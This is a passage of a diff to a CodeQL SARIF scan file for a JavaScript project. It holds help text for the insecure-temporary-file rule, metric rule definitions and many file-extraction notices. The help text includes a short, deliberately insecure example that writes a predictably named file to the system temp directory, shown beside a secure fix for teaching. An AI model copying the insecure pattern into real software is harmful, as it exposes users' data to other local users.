These libraries ensure both that the file is inaccessible to other users and that the file does not already exist.\n\n\n## Example\nThe following example creates a temporary file in the operating system's temporary directory.\n\n\n```javascript\nconst fs = require('fs');\nconst os = require('os');\nconst path = require('path');\n\nconst file = path.join(os.tmpdir(), \"test-\" + (new Date()).getTime() + \".txt\");\nfs.writeFileSync(file, \"content\");\n```\nThe file created above is accessible to other users, and there is no guarantee that the file does not already exist.\n\nThe below example uses the [tmp](https://www.npmjs.com/package/tmp) library to securely create a temporary file.\n\n\n```javascript\nconst fs = require('fs');\nconst tmp = require('tmp');\n\nconst file = tmp.fileSync().name;\nfs.writeFileSync(file, \"content\");\n```\n\n## References\n* Mitre.org: [CWE-377](https://cwe.mitre.org/data/definitions/377.html).\n* NPM: [tmp](https://www.npmjs.com/package/tmp).\n* Common Weakness Enumeration: [CWE-377](https://cwe.mitre.org/data/definitions/377.html).\n* Common Weakness Enumeration: [CWE-378](https://cwe.mitre.org/data/definitions/378.html).\n", + "markdown" : "# Insecure temporary file\nTemporary files created in the operating system's temporary directory are by default accessible to other users. In some cases, this can lead to information exposure, or in the worst case, to remote code execution.\n\n\n## Recommendation\nUse a well-tested library like [tmp](https://www.npmjs.com/package/tmp) for creating temporary files. 
These libraries ensure both that the file is inaccessible to other users and that the file does not already exist.\n\n\n## Example\nThe following example creates a temporary file in the operating system's temporary directory.\n\n\n```javascript\nconst fs = require('fs');\nconst os = require('os');\nconst path = require('path');\n\nconst file = path.join(os.tmpdir(), \"test-\" + (new Date()).getTime() + \".txt\");\nfs.writeFileSync(file, \"content\");\n```\nThe file created above is accessible to other users, and there is no guarantee that the file does not already exist.\n\nThe below example uses the [tmp](https://www.npmjs.com/package/tmp) library to securely create a temporary file.\n\n\n```javascript\nconst fs = require('fs');\nconst tmp = require('tmp');\n\nconst file = tmp.fileSync().name;\nfs.writeFileSync(file, \"content\");\n```\n\n## References\n* Mitre.org: [CWE-377](https://cwe.mitre.org/data/definitions/377.html).\n* NPM: [tmp](https://www.npmjs.com/package/tmp).\n* Common Weakness Enumeration: [CWE-377](https://cwe.mitre.org/data/definitions/377.html).\n* Common Weakness Enumeration: [CWE-378](https://cwe.mitre.org/data/definitions/378.html).\n" + }, + "properties" : { + "tags" : [ "external/cwe/cwe-377", "external/cwe/cwe-378", "security" ], + "description" : "Creating a temporary file that is accessible by other users can\n lead to information disclosure and sometimes remote code execution.", + "id" : "js/insecure-temporary-file", + "kind" : "path-problem", + "name" : "Insecure temporary file", + "precision" : "medium", + "problem.severity" : "warning", + "security-severity" : "7.0" + } + }, { + "id" : "js/summary/lines-of-code", + "name" : "js/summary/lines-of-code", + "shortDescription" : { + "text" : "Total lines of JavaScript and TypeScript code in the database" + }, + "fullDescription" : { + "text" : "The total number of lines of JavaScript or TypeScript code across all files checked into the repository, except in `node_modules`. 
This is a useful metric of the size of a database. For all files that were seen during extraction, this query counts the lines of code, excluding whitespace or comments." + }, + "defaultConfiguration" : { + "enabled" : true + }, + "properties" : { + "tags" : [ "summary" ], + "description" : "The total number of lines of JavaScript or TypeScript code across all files checked into the repository, except in `node_modules`. This is a useful metric of the size of a database. For all files that were seen during extraction, this query counts the lines of code, excluding whitespace or comments.", + "id" : "js/summary/lines-of-code", + "kind" : "metric", + "name" : "Total lines of JavaScript and TypeScript code in the database" + } + }, { + "id" : "js/summary/lines-of-user-code", + "name" : "js/summary/lines-of-user-code", + "shortDescription" : { + "text" : "Total lines of user written JavaScript and TypeScript code in the database" + }, + "fullDescription" : { + "text" : "The total number of lines of JavaScript and TypeScript code from the source code directory, excluding auto-generated files and files in `node_modules`. This query counts the lines of code, excluding whitespace or comments." + }, + "defaultConfiguration" : { + "enabled" : true + }, + "properties" : { + "tags" : [ "summary", "lines-of-code" ], + "description" : "The total number of lines of JavaScript and TypeScript code from the source code directory,\n excluding auto-generated files and files in `node_modules`. This query counts the lines of code, excluding\n whitespace or comments.", + "id" : "js/summary/lines-of-user-code", + "kind" : "metric", + "name" : "Total lines of user written JavaScript and TypeScript code in the database" + } + } ], + "locations" : [ { + "uri" : "file:///opt/hostedtoolcache/CodeQL/2.15.1/x64/codeql/qlpacks/codeql/javascript-queries/0.8.1/", + "description" : { + "text" : "The QL pack root directory." 
+ } + }, { + "uri" : "file:///opt/hostedtoolcache/CodeQL/2.15.1/x64/codeql/qlpacks/codeql/javascript-queries/0.8.1/qlpack.yml", + "description" : { + "text" : "The QL pack definition file." + } + } ] + } ] }, - "error": { - "+": 0, - "-": 0, - "codes": {} + "invocations" : [ { + "toolExecutionNotifications" : [ { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : ".github/actions/install-codeql/action.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 5 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : ".github/actions/install-qlt/action.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 6 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : ".github/codeql/codeql-config.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 7 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : ".github/codeql/extensions/javascript/frameworks/cap/ext/ext/codeql-pack.lock.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 8 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + 
"index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : ".github/codeql/extensions/javascript/frameworks/cap/ext/ext/qlpack.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 9 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : ".github/codeql/extensions/javascript/frameworks/ui5/ext/ext/codeql-pack.lock.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 10 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : ".github/codeql/extensions/javascript/frameworks/ui5/ext/ext/qlpack.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 11 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : ".github/codeql/extensions/javascript/frameworks/ui5/ext/ext/ui5.model.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 12 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + 
"formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : ".github/codeql/extensions/javascript/heuristic-models/ext/ext/additional-sources.model.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 13 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : ".github/codeql/extensions/javascript/heuristic-models/ext/ext/codeql-pack.lock.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 14 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : ".github/codeql/extensions/javascript/heuristic-models/ext/ext/qlpack.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 15 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : ".github/workflows/code_scanning.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 16 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { 
+ "artifactLocation" : { + "uri" : ".github/workflows/run-codeql-unit-tests-javascript.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 17 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "codeql-workspace.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 18 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/lib/codeql-pack.lock.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 19 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/lib/qlpack.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 20 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/src/qlpack.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 21 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { 
+ "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/src/codeql-pack.lock.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 22 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/codeql-pack.lock.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 23 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/qlpack.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 24 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 25 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 
3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 26 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/server.js", + "uriBaseId" : "%SRCROOT%", + "index" : 27 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 28 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service2.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 29 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : 
"none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 30 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 31 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 32 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : 
"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/server.js", + "uriBaseId" : "%SRCROOT%", + "index" : 33 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 34 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 35 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 36 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + 
"formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service2.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 37 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 38 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 39 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 40 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : 
"js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/server.js", + "uriBaseId" : "%SRCROOT%", + "index" : 41 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 42 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 43 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service2.cds.json", + "uriBaseId" : 
"%SRCROOT%", + "index" : 44 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 45 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 46 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 47 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : 
"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/server.js", + "uriBaseId" : "%SRCROOT%", + "index" : 48 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 49 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service2.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 50 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 51 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" 
+ } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 52 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 53 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 54 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/server.js", + "uriBaseId" : "%SRCROOT%", + "index" : 55 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + 
"index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/privileged-user.js", + "uriBaseId" : "%SRCROOT%", + "index" : 56 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 57 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + 